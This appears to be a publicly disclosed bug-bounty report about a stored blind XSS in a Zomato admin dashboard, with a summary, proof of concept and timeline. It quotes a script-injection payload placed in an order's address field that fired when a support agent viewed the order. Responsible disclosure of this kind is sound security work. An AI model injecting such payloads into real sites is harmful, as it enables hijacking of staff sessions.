[www.zomato.com] Blind XSS in one of the Admin Dashboard
State Resolved (Closed)
Disclosed publicly 2018-12-03T07:02:09.537Z
Reported To
Weakness Cross-site Scripting (XSS) - Stored
Bounty $500
Collapse

Summary by sandeep_hodkasia

@sandeep_hodkasia identified a Blind XSS vulnerability that fired in one of our admin dashboard.

POC

  • @sandeep_hodkasia added "><script>alert(0);</script> [XSS Hunter was used in this case] in address field while placing an order.

  • XSS triggered when one of our support agent viewed the order details.

Thanks @sandeep_hodkasia for helping us keep @zomato secure :)

Best,
Prateek

Timeline
submitted a report to Zomato .
2018-10-05T18:31:32.455Z

Regards,
Frans

  • 0 attachments:
prateek_0490-zomato Activities::BugTriaged
2018-10-05T18:36:09.913Z


prateek_0490-zomato Activities::Comment
2018-10-05T18:37:39.337Z


sandeep_hodkasia Activities::Comment
2018-10-05T19:23:52.355Z


prateek_0490-zomato Activities::BugResolved
2018-10-06T11:57:24.182Z


sandeep_hodkasia Activities::Comment
2018-10-06T12:43:17.779Z


Activities::BountyAwarded
2018-10-06T13:00:09.360Z


sandeep_hodkasia Activities::AgreedOnGoingPublic
2018-11-28T10:59:23.750Z


prateek_0490-zomato Activities::Comment
2018-11-28T11:00:30.303Z


prateek_0490-zomato Activities::ReportTitleUpdated
2018-11-28T11:09:02.618Z


sandeep_hodkasia Activities::Comment
2018-12-03T04:06:39.635Z


prateek_0490-zomato Activities::AgreedOnGoingPublic
2018-12-03T07:02:09.490Z


prateek_0490-zomato Activities::ReportBecamePublic
2018-12-03T07:02:09.557Z